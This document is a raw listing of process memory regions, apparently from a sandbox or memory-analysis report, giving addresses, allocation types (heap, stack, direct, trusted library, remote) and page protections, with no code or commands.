ADB6000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B21B000
direct allocation
page execute and read and write
A97D000
direct allocation
page execute and read and write
BC52000
direct allocation
page execute and read and write
B8FE000
direct allocation
page execute and read and write
6490000
direct allocation
page read and write
AE79000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B2CD000
direct allocation
page execute and read and write
B5E1000
direct allocation
page execute and read and write
B24E000
direct allocation
page execute and read and write
84AA000
heap
page read and write
85FD000
heap
page read and write
AF4B000
direct allocation
page execute and read and write
ADD0000
direct allocation
page execute and read and write
230E6000
trusted library allocation
page read and write
AC99000
direct allocation
page execute and read and write
B1DB000
direct allocation
page execute and read and write
B7B4000
direct allocation
page execute and read and write
BF23000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
BDB9000
direct allocation
page execute and read and write
B82C000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
7A84000
trusted library allocation
page read and write
86A0000
heap
page read and write
B86A000
direct allocation
page execute and read and write
AFFA000
direct allocation
page execute and read and write
23DF8000
trusted library allocation
page read and write
B1E1000
direct allocation
page execute and read and write
AC80000
direct allocation
page execute and read and write
B005000
direct allocation
page execute and read and write
B08D000
direct allocation
page execute and read and write
AD96000
direct allocation
page execute and read and write
511E000
stack
page read and write
23F30000
trusted library allocation
page read and write
513000
heap
page read and write
B0BE000
direct allocation
page execute and read and write
4FF7000
trusted library allocation
page read and write
AE63000
direct allocation
page execute and read and write
B6BF000
direct allocation
page execute and read and write
24EB1000
trusted library allocation
page read and write
7560000
heap
page execute and read and write
24C80000
trusted library allocation
page read and write
6FE0000
direct allocation
page read and write
24EAE000
stack
page read and write
70FD000
heap
page read and write
B02B000
direct allocation
page execute and read and write
22E0B000
trusted library allocation
page read and write
BB11000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
AB5D000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B6B3000
direct allocation
page execute and read and write
B0C6000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
B3AC000
direct allocation
page execute and read and write
B3F0000
direct allocation
page execute and read and write
AD8B000
direct allocation
page execute and read and write
B989000
direct allocation
page execute and read and write
B03C000
direct allocation
page execute and read and write
220E8000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
BA19000
direct allocation
page execute and read and write
8833000
trusted library allocation
page read and write
BE5D000
direct allocation
page execute and read and write
ADB5000
direct allocation
page execute and read and write
891F000
heap
page read and write
7C70000
trusted library allocation
page read and write
B9D7000
direct allocation
page execute and read and write
3470000
trusted library allocation
page read and write
BB5D000
direct allocation
page execute and read and write
B3F2000
direct allocation
page execute and read and write
B543000
direct allocation
page execute and read and write
BAC0000
direct allocation
page execute and read and write
2216A000
trusted library allocation
page read and write
22AD7000
trusted library allocation
page read and write
BC8C000
direct allocation
page execute and read and write
B82E000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
AFB5000
direct allocation
page execute and read and write
78F0000
trusted library allocation
page read and write
B9EE000
direct allocation
page execute and read and write
2456E000
stack
page read and write
2EAE000
stack
page read and write
AD98000
direct allocation
page execute and read and write
23BB4000
trusted library allocation
page read and write
B22C000
direct allocation
page execute and read and write
B83E000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
BAC2000
direct allocation
page execute and read and write
BDD3000
direct allocation
page execute and read and write
8917000
heap
page read and write
230EC000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
222F000
stack
page read and write
A60A000
direct allocation
page execute and read and write
BBCE000
direct allocation
page execute and read and write
AE46000
direct allocation
page execute and read and write
B1E5000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
AA90000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
B477000
direct allocation
page execute and read and write
A9E5000
direct allocation
page execute and read and write
B146000
direct allocation
page execute and read and write
BC2E000
direct allocation
page execute and read and write
B5F8000
direct allocation
page execute and read and write
25794000
trusted library allocation
page read and write
ADBB000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B280000
direct allocation
page execute and read and write
BB75000
direct allocation
page execute and read and write
24AA0000
trusted library allocation
page read and write
B156000
direct allocation
page execute and read and write
ADE4000
direct allocation
page execute and read and write
5B43000
trusted library allocation
page read and write
B790000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B325000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
32C5000
heap
page read and write
2295C000
trusted library allocation
page read and write
B921000
direct allocation
page execute and read and write
B242000
direct allocation
page execute and read and write
B658000
direct allocation
page execute and read and write
6FB7000
heap
page read and write
B66D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BA8C000
direct allocation
page execute and read and write
B4FC000
direct allocation
page execute and read and write
BA98000
direct allocation
page execute and read and write
3130000
heap
page readonly
B985000
direct allocation
page execute and read and write
22170000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B8A2000
direct allocation
page execute and read and write
B014000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
6F20000
direct allocation
page read and write
B49D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
22174000
trusted library allocation
page read and write
31D0000
heap
page read and write
21FA9000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
3225000
trusted library allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B244000
direct allocation
page execute and read and write
B3A5000
direct allocation
page execute and read and write
BC66000
direct allocation
page execute and read and write
B5BA000
direct allocation
page execute and read and write
B130000
direct allocation
page execute and read and write
256F0000
trusted library allocation
page read and write
BA73000
direct allocation
page execute and read and write
24317000
heap
page read and write
BBAC000
direct allocation
page execute and read and write
25790000
trusted library allocation
page read and write
B14A000
direct allocation
page execute and read and write
23F46000
trusted library allocation
page read and write
B2E9000
direct allocation
page execute and read and write
ADCE000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
21D7F000
stack
page read and write
B966000
direct allocation
page execute and read and write
BDD2000
direct allocation
page execute and read and write
574000
trusted library allocation
page read and write
BBA9000
direct allocation
page execute and read and write
3539000
heap
page read and write
23C18000
trusted library allocation
page read and write
AE9E000
direct allocation
page execute and read and write
23F40000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B40D000
direct allocation
page execute and read and write
23C0C000
trusted library allocation
page read and write
AF40000
direct allocation
page execute and read and write
B090000
direct allocation
page execute and read and write
24CA0000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
4E90000
heap
page read and write
B246000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
74CC000
heap
page read and write
B8E7000
direct allocation
page execute and read and write
2306F000
trusted library allocation
page read and write
23FB0000
trusted library allocation
page read and write
BD48000
direct allocation
page execute and read and write
22AC8000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
B0E3000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
ACBD000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
4DD5000
heap
page execute and read and write
AFE9000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
B025000
direct allocation
page execute and read and write
B9FF000
direct allocation
page execute and read and write
B33A000
direct allocation
page execute and read and write
AF81000
direct allocation
page execute and read and write
B96D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B1BD000
direct allocation
page execute and read and write
B0F6000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
741E000
stack
page read and write
21A8E000
stack
page read and write
256B0000
trusted library allocation
page read and write
A976000
direct allocation
page execute and read and write
B628000
direct allocation
page execute and read and write
B3B8000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
96000
stack
page read and write
24BDA000
heap
page read and write
22A97000
trusted library allocation
page read and write
B078000
direct allocation
page execute and read and write
B816000
direct allocation
page execute and read and write
BCE6000
direct allocation
page execute and read and write
24CC0000
trusted library allocation
page execute and read and write
23924000
trusted library allocation
page read and write
B39F000
direct allocation
page execute and read and write
AE67000
direct allocation
page execute and read and write
BC01000
direct allocation
page execute and read and write
BCB1000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
B8F1000
direct allocation
page execute and read and write
B7E3000
direct allocation
page execute and read and write
BCDC000
direct allocation
page execute and read and write
BDC1000
direct allocation
page execute and read and write
A9A3000
direct allocation
page execute and read and write
592000
trusted library allocation
page read and write
21A0D000
stack
page read and write
B63A000
direct allocation
page execute and read and write
B2D0000
direct allocation
page execute and read and write
23B10000
trusted library allocation
page read and write
24CB0000
trusted library allocation
page read and write
BE9A000
direct allocation
page execute and read and write
4F90000
remote allocation
page execute and read and write
ACE7000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B518000
direct allocation
page execute and read and write
24B80000
heap
page read and write
BA0D000
direct allocation
page execute and read and write
B87F000
direct allocation
page execute and read and write
AE86000
direct allocation
page execute and read and write
627000
heap
page read and write
25790000
trusted library allocation
page read and write
B9DD000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
242CB000
heap
page read and write
B154000
direct allocation
page execute and read and write
8A20000
direct allocation
page execute and read and write
A7D4000
direct allocation
page execute and read and write
8C50000
trusted library allocation
page read and write
228C0000
trusted library allocation
page read and write
AF38000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B073000
direct allocation
page execute and read and write
AEEB000
direct allocation
page execute and read and write
B844000
direct allocation
page execute and read and write
23A2A000
trusted library allocation
page read and write
BE52000
direct allocation
page execute and read and write
AF1F000
direct allocation
page execute and read and write
BC3A000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page execute and read and write
B400000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BC4C000
direct allocation
page execute and read and write
B792000
direct allocation
page execute and read and write
78D0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
BA6F000
direct allocation
page execute and read and write
BEDA000
direct allocation
page execute and read and write
AB63000
direct allocation
page execute and read and write
AF32000
direct allocation
page execute and read and write
23971000
trusted library allocation
page read and write
AF49000
direct allocation
page execute and read and write
B2E4000
direct allocation
page execute and read and write
B804000
direct allocation
page execute and read and write
23F05000
trusted library allocation
page read and write
22C08000
trusted library allocation
page read and write
B0FC000
direct allocation
page execute and read and write
BD73000
direct allocation
page execute and read and write
BCE9000
direct allocation
page execute and read and write
229B8000
trusted library allocation
page read and write
ADEC000
direct allocation
page execute and read and write
2452E000
stack
page read and write
24EB0000
trusted library allocation
page read and write
AD91000
direct allocation
page execute and read and write
5B6A000
trusted library allocation
page read and write
B1D7000
direct allocation
page execute and read and write
21B4E000
stack
page read and write
AEB0000
direct allocation
page execute and read and write
2F47000
heap
page read and write
231C5000
trusted library allocation
page read and write
BD0B000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BE88000
direct allocation
page execute and read and write
6D60000
heap
page readonly
AEB3000
direct allocation
page execute and read and write
BA11000
direct allocation
page execute and read and write
B4FE000
direct allocation
page execute and read and write
BB47000
direct allocation
page execute and read and write
3222000
trusted library allocation
page read and write
BD65000
direct allocation
page execute and read and write
AF7B000
direct allocation
page execute and read and write
B282000
direct allocation
page execute and read and write
6EDD000
stack
page read and write
AF2B000
direct allocation
page execute and read and write
2FA9000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
BB59000
direct allocation
page execute and read and write
AD8F000
direct allocation
page execute and read and write
B620000
direct allocation
page execute and read and write
BBA1000
direct allocation
page execute and read and write
21E9C000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page execute and read and write
25060000
trusted library allocation
page read and write
B68A000
direct allocation
page execute and read and write
BB81000
direct allocation
page execute and read and write
5B87000
trusted library allocation
page read and write
21E5F000
trusted library allocation
page read and write
AE93000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B453000
direct allocation
page execute and read and write
25040000
trusted library allocation
page read and write
AF51000
direct allocation
page execute and read and write
ACFA000
direct allocation
page execute and read and write
7AD0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B7A4000
direct allocation
page execute and read and write
3208000
heap
page read and write
B0EE000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
A65D000
direct allocation
page execute and read and write
7565000
heap
page execute and read and write
25700000
trusted library allocation
page read and write
452000
unkown
page readonly
AD17000
direct allocation
page execute and read and write
AF6F000
direct allocation
page execute and read and write
7A70000
trusted library allocation
page read and write
BAE0000
direct allocation
page execute and read and write
A961000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page read and write
BFFB000
direct allocation
page execute and read and write
242EA000
heap
page read and write
BA13000
direct allocation
page execute and read and write
B62E000
direct allocation
page execute and read and write
BE54000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B413000
direct allocation
page execute and read and write
B964000
direct allocation
page execute and read and write
B060000
direct allocation
page execute and read and write
ADD9000
direct allocation
page execute and read and write
ABD1000
direct allocation
page execute and read and write
7C40000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
22BED000
trusted library allocation
page read and write
BD78000
direct allocation
page execute and read and write
B127000
direct allocation
page execute and read and write
BBE7000
direct allocation
page execute and read and write
60E000
stack
page read and write
B468000
direct allocation
page execute and read and write
24C60000
heap
page read and write
24C70000
trusted library allocation
page read and write
BCC2000
direct allocation
page execute and read and write
AB7F000
direct allocation
page execute and read and write
AFD4000
direct allocation
page execute and read and write
B11A000
direct allocation
page execute and read and write
AE2E000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
AF12000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
AEA5000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B390000
direct allocation
page execute and read and write
B888000
direct allocation
page execute and read and write
2275000
heap
page read and write
873D000
stack
page read and write
460000
heap
page read and write
BA29000
direct allocation
page execute and read and write
573000
trusted library allocation
page execute and read and write
AB18000
direct allocation
page execute and read and write
21DE0000
heap
page read and write
226E000
stack
page read and write
25700000
trusted library allocation
page read and write
22490000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
AFE7000
direct allocation
page execute and read and write
B9CC000
direct allocation
page execute and read and write
B8B7000
direct allocation
page execute and read and write
B999000
direct allocation
page execute and read and write
257F0000
trusted library allocation
page read and write
B386000
direct allocation
page execute and read and write
22983000
trusted library allocation
page read and write
AE05000
direct allocation
page execute and read and write
22C6B000
trusted library allocation
page read and write
220E2000
trusted library allocation
page read and write
24FFE000
stack
page read and write
BB1D000
direct allocation
page execute and read and write
B32A000
direct allocation
page execute and read and write
21F80000
trusted library allocation
page read and write
AF7F000
direct allocation
page execute and read and write
BCAD000
direct allocation
page execute and read and write
B2BB000
direct allocation
page execute and read and write
7C10000
trusted library allocation
page read and write
A990000
direct allocation
page execute and read and write
6F80000
direct allocation
page read and write
BCD2000
direct allocation
page execute and read and write
BBD2000
direct allocation
page execute and read and write
B824000
direct allocation
page execute and read and write
B5FF000
direct allocation
page execute and read and write
6F30000
direct allocation
page read and write
B802000
direct allocation
page execute and read and write
AF16000
direct allocation
page execute and read and write
B1D5000
direct allocation
page execute and read and write
8A8F000
heap
page read and write
B9C3000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BADD000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
5310000
direct allocation
page read and write
256D0000
trusted library allocation
page read and write
AE51000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
24A90000
trusted library allocation
page read and write
2208F000
trusted library allocation
page read and write
BC12000
direct allocation
page execute and read and write
B789000
direct allocation
page execute and read and write
BAC4000
direct allocation
page execute and read and write
B4F0000
direct allocation
page execute and read and write
B1CF000
direct allocation
page execute and read and write
B256000
direct allocation
page execute and read and write
B65C000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
BE7A000
direct allocation
page execute and read and write
239D7000
trusted library allocation
page read and write
B598000
direct allocation
page execute and read and write
615000
heap
page read and write
B8B6000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
AE91000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
7CA0000
trusted library allocation
page read and write
70C0000
heap
page read and write
24AA0000
trusted library allocation
page read and write
3239000
heap
page read and write
2FC5000
trusted library allocation
page execute and read and write
BF7C000
direct allocation
page execute and read and write
22E19000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
24CB0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BFC6000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BB98000
direct allocation
page execute and read and write
BC8F000
direct allocation
page execute and read and write
B505000
direct allocation
page execute and read and write
B680000
direct allocation
page execute and read and write
7010000
direct allocation
page read and write
8694000
stack
page read and write
241A0000
heap
page execute and read and write
BB48000
direct allocation
page execute and read and write
23AD3000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
50BD000
stack
page read and write
AEED000
direct allocation
page execute and read and write
B07B000
direct allocation
page execute and read and write
ABDD000
direct allocation
page execute and read and write
B62A000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B7A0000
direct allocation
page execute and read and write
2217D000
trusted library allocation
page read and write
B9F7000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
6FA0000
direct allocation
page read and write
256D0000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
2FBA000
trusted library allocation
page execute and read and write
2F00000
heap
page read and write
24EB0000
trusted library allocation
page read and write
B1B8000
direct allocation
page execute and read and write
AEBD000
direct allocation
page execute and read and write
7871000
heap
page read and write
23FB0000
trusted library allocation
page read and write
B8F3000
direct allocation
page execute and read and write
B21B000
direct allocation
page execute and read and write
BA61000
direct allocation
page execute and read and write
242F7000
heap
page read and write
8927000
heap
page read and write
AFB1000
direct allocation
page execute and read and write
AF77000
direct allocation
page execute and read and write
BF19000
direct allocation
page execute and read and write
64A0000
direct allocation
page read and write
256D0000
trusted library allocation
page read and write
B5E0000
direct allocation
page execute and read and write
BDDC000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B70F000
direct allocation
page execute and read and write
B0F2000
direct allocation
page execute and read and write
BF44000
direct allocation
page execute and read and write
B524000
direct allocation
page execute and read and write
BB37000
direct allocation
page execute and read and write
B1DF000
direct allocation
page execute and read and write
7380000
direct allocation
page read and write
8810000
trusted library allocation
page read and write
256E0000
trusted library allocation
page read and write
AFC6000
direct allocation
page execute and read and write
A82C000
direct allocation
page execute and read and write
B270000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page read and write
34A7000
heap
page read and write
B971000
direct allocation
page execute and read and write
AF87000
direct allocation
page execute and read and write
24C90000
trusted library allocation
page read and write
BDA5000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
21EA4000
trusted library allocation
page read and write
BBEE000
direct allocation
page execute and read and write
B626000
direct allocation
page execute and read and write
24985000
trusted library allocation
page read and write
B00B000
direct allocation
page execute and read and write
B518000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BBF6000
direct allocation
page execute and read and write
B257000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BBBD000
direct allocation
page execute and read and write
AF6C000
direct allocation
page execute and read and write
783D000
stack
page read and write
BB1B000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
AD97000
direct allocation
page execute and read and write
B1B7000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B1CD000
direct allocation
page execute and read and write
25700000
trusted library allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
BB9F000
direct allocation
page execute and read and write
6FB0000
heap
page read and write
B08E000
direct allocation
page execute and read and write
AFF4000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
22E04000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
A98E000
direct allocation
page execute and read and write
B306000
direct allocation
page execute and read and write
AFE9000
direct allocation
page execute and read and write
24311000
heap
page read and write
B668000
direct allocation
page execute and read and write
BA7F000
direct allocation
page execute and read and write
AD34000
direct allocation
page execute and read and write
5EC9000
trusted library allocation
page read and write
BD09000
direct allocation
page execute and read and write
B07F000
direct allocation
page execute and read and write
BB7B000
direct allocation
page execute and read and write
2F40000
heap
page read and write
B8EB000
direct allocation
page execute and read and write
AF53000
direct allocation
page execute and read and write
BC89000
direct allocation
page execute and read and write
AF60000
direct allocation
page execute and read and write
5A5000
trusted library allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B65E000
direct allocation
page execute and read and write
B6DA000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
228E0000
trusted library allocation
page read and write
B16A000
direct allocation
page execute and read and write
2FE4000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
AD7F000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
B846000
direct allocation
page execute and read and write
B321000
direct allocation
page execute and read and write
AE98000
direct allocation
page execute and read and write
AF8E000
direct allocation
page execute and read and write
B9F9000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
242E0000
heap
page read and write
7F928000
trusted library allocation
page execute and read and write
B380000
direct allocation
page execute and read and write
AFDF000
direct allocation
page execute and read and write
21F85000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
BE25000
direct allocation
page execute and read and write
B703000
direct allocation
page execute and read and write
B30A000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
BA1F000
direct allocation
page execute and read and write
B17E000
direct allocation
page execute and read and write
BE9F000
direct allocation
page execute and read and write
22900000
heap
page read and write
B071000
direct allocation
page execute and read and write
B635000
direct allocation
page execute and read and write
AF47000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
AB5F000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
A961000
direct allocation
page execute and read and write
8A4B000
heap
page read and write
BFDB000
direct allocation
page execute and read and write
B6C1000
direct allocation
page execute and read and write
A64C000
direct allocation
page execute and read and write
B20A000
direct allocation
page execute and read and write
AD2C000
direct allocation
page execute and read and write
23024000
trusted library allocation
page read and write
AC5E000
direct allocation
page execute and read and write
BDFB000
direct allocation
page execute and read and write
24EC0000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
BC74000
direct allocation
page execute and read and write
400000
unkown
page readonly
239C1000
trusted library allocation
page read and write
BA15000
direct allocation
page execute and read and write
BB17000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
BA2B000
direct allocation
page execute and read and write
B012000
direct allocation
page execute and read and write
8A71000
heap
page read and write
B499000
direct allocation
page execute and read and write
6D70000
heap
page read and write
B3B2000
direct allocation
page execute and read and write
BF66000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
2255D000
stack
page read and write
BD18000
direct allocation
page execute and read and write
ADA8000
direct allocation
page execute and read and write
25054000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
407000
unkown
page readonly
227C8000
trusted library allocation
page read and write
8310000
trusted library allocation
page execute and read and write
23C32000
trusted library allocation
page read and write
B43D000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B05E000
direct allocation
page execute and read and write
53CE000
trusted library allocation
page read and write
B3B6000
direct allocation
page execute and read and write
BCA7000
direct allocation
page execute and read and write
3200000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
AC95000
direct allocation
page execute and read and write
BC2B000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
AF4F000
direct allocation
page execute and read and write
322B000
trusted library allocation
page execute and read and write
A861000
direct allocation
page execute and read and write
BABC000
direct allocation
page execute and read and write
A7D2000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
8470000
heap
page read and write
2F90000
trusted library allocation
page read and write
B634000
direct allocation
page execute and read and write
B894000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
22B1A000
trusted library allocation
page read and write
7899000
heap
page read and write
B0C2000
direct allocation
page execute and read and write
6636000
heap
page read and write
8AF5000
trusted library allocation
page read and write
6540000
direct allocation
page read and write
B630000
direct allocation
page execute and read and write
2FD0000
trusted library allocation
page read and write
24954000
trusted library allocation
page read and write
6F90000
direct allocation
page read and write
BCA0000
direct allocation
page execute and read and write
24AA0000
trusted library allocation
page read and write
BC5A000
direct allocation
page execute and read and write
7587000
trusted library allocation
page read and write
AD88000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B44D000
direct allocation
page execute and read and write
B132000
direct allocation
page execute and read and write
A62C000
direct allocation
page execute and read and write
B81E000
direct allocation
page execute and read and write
BD86000
direct allocation
page execute and read and write
B2A4000
direct allocation
page execute and read and write
B6AC000
direct allocation
page execute and read and write
223AD000
stack
page read and write
B9AD000
direct allocation
page execute and read and write
B573000
direct allocation
page execute and read and write
565E000
trusted library allocation
page read and write
AF25000
direct allocation
page execute and read and write
2430F000
heap
page read and write
AEAE000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B2A2000
direct allocation
page execute and read and write
70BC000
heap
page read and write
242F8000
heap
page read and write
23FA0000
trusted library allocation
page read and write
B9D9000
direct allocation
page execute and read and write
B5CB000
direct allocation
page execute and read and write
ADBF000
direct allocation
page execute and read and write
7C80000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BEC3000
direct allocation
page execute and read and write
2251F000
stack
page read and write
2246E000
stack
page read and write
257E5000
trusted library allocation
page read and write
AF5F000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
ADCC000
direct allocation
page execute and read and write
B274000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B332000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B8DC000
direct allocation
page execute and read and write
50C0000
trusted library allocation
page read and write
97D0000
direct allocation
page execute and read and write
256C0000
trusted library allocation
page execute and read and write
65EE000
heap
page read and write
B06B000
direct allocation
page execute and read and write
BA42000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
6850000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B9D7000
direct allocation
page execute and read and write
BCBA000
direct allocation
page execute and read and write
23090000
trusted library allocation
page read and write
6FD0000
direct allocation
page read and write
22172000
trusted library allocation
page read and write
BC38000
direct allocation
page execute and read and write
B113000
direct allocation
page execute and read and write
AC5C000
direct allocation
page execute and read and write
BFF4000
direct allocation
page execute and read and write
BA63000
direct allocation
page execute and read and write
BB19000
direct allocation
page execute and read and write
B219000
direct allocation
page execute and read and write
23F9D000
stack
page read and write
B59A000
direct allocation
page execute and read and write
B873000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
24D90000
trusted library allocation
page read and write
4590000
remote allocation
page execute and read and write
B0C0000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
ACA7000
direct allocation
page execute and read and write
B4A1000
direct allocation
page execute and read and write
BC3D000
direct allocation
page execute and read and write
23FB0000
trusted library allocation
page read and write
BB15000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
BA0F000
direct allocation
page execute and read and write
B459000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
BC58000
direct allocation
page execute and read and write
B33C000
direct allocation
page execute and read and write
BAF0000
direct allocation
page execute and read and write
2FB0000
trusted library allocation
page read and write
B5F0000
direct allocation
page execute and read and write
25056000
trusted library allocation
page read and write
23F40000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
BE09000
direct allocation
page execute and read and write
B88E000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
B96F000
direct allocation
page execute and read and write
AEDF000
direct allocation
page execute and read and write
B91D000
direct allocation
page execute and read and write
AD8D000
direct allocation
page execute and read and write
BBF2000
direct allocation
page execute and read and write
B3C9000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
BD09000
direct allocation
page execute and read and write
2FE3000
trusted library allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B85F000
direct allocation
page execute and read and write
B1E3000
direct allocation
page execute and read and write
AB3A000
direct allocation
page execute and read and write
7935000
heap
page read and write
2209B000
trusted library allocation
page read and write
B0A1000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
21EA8000
trusted library allocation
page read and write
23CA4000
trusted library allocation
page read and write
B0E2000
direct allocation
page execute and read and write
AF71000
direct allocation
page execute and read and write
7499000
heap
page read and write
ADF3000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B7C1000
direct allocation
page execute and read and write
42F000
unkown
page read and write
240B0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
21FA3000
trusted library allocation
page read and write
BFA2000
direct allocation
page execute and read and write
22095000
trusted library allocation
page read and write
24EC0000
trusted library allocation
page read and write
B6D5000
direct allocation
page execute and read and write
24AA0000
trusted library allocation
page read and write
25790000
trusted library allocation
page read and write
